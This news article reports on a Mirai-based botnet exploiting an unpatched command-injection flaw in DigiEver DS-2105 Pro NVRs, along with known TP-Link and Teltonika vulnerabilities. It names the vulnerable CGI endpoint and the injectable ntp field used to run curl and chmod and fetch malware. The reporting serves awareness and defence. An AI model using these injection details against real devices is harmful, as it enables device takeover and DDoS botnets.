A newly discovered botnet, based on the notorious Mirai framework, is wreaking havoc by exploiting a remote code execution vulnerability found in DigiEver DS-2105 Pro NVRs. This vulnerability, which lacks a designated tracker number and remains unpatched, poses a significant threat to users of these devices.

This malicious campaign initiated in October, focusing on a range of network video recorders and TP-Link routers with outdated firmware. Notably, one of the vulnerabilities being exploited was highlighted by TXOne researcher Ta-Lun Yen during last year’s DefCamp security conference in Bucharest, Romania. At that time, Yen cautioned that this flaw affects various digital video recorder (DVR) devices.

How It Works

According to researchers at Akamai, the botnet began exploiting the DigiEver vulnerability around mid-November, although evidence suggests its activity dates back to September. The malicious actors are leveraging a serious remote code execution (RCE) flaw that targets the /cgi-bin/cgi_main.cgi URI—this vulnerability fails to validate user inputs properly.

As a result, attackers can send malicious commands such as 'curl' and 'chmod' via specific parameters, including the ntp field in HTTP POST requests. Once executed, this command injection allows hackers to fetch malware from an external server and add the compromised device to their botnet.

Importantly, once an NVR incurs this compromise, it can be weaponized for distributed denial of service (DDoS) attacks and may even spread to other vulnerable devices using exploit sets and credential lists.

Targeting Multiple Vulnerabilities

In addition to the DigiEver flaw, this evolving Mirai variant is also taking aim at CVE-2023-1389, a known vulnerability affecting TP-Link devices, and CVE-2018-17532 that targets Teltonika RUT9XX routers.

Akamai researchers have noted that this new variant distinguishes itself through the use of XOR and ChaCha20 encryption. While advanced encryption methods aren't entirely new to botnets, they're indicative of an evolution in tactics among Mirai-based operators. This is a significant shift as many existing Mirai botnets still rely on older, less sophisticated string obfuscation methods drawn from the original Mirai malware source code.

Stay Vigilant

As cyber threats become more sophisticated, it’s crucial for users to stay informed and proactive. Checking for device updates and applying patches promptly can help mitigate these vulnerabilities. Indicators of compromise (IoC) connected with this botnet surge are available in Akamai's detailed report, which also includes Yara rules for detecting and blocking this emerging threat.

In a world where threats from malicious botnets continue to evolve, it’s critical to take preventive measures—don’t become the next victim!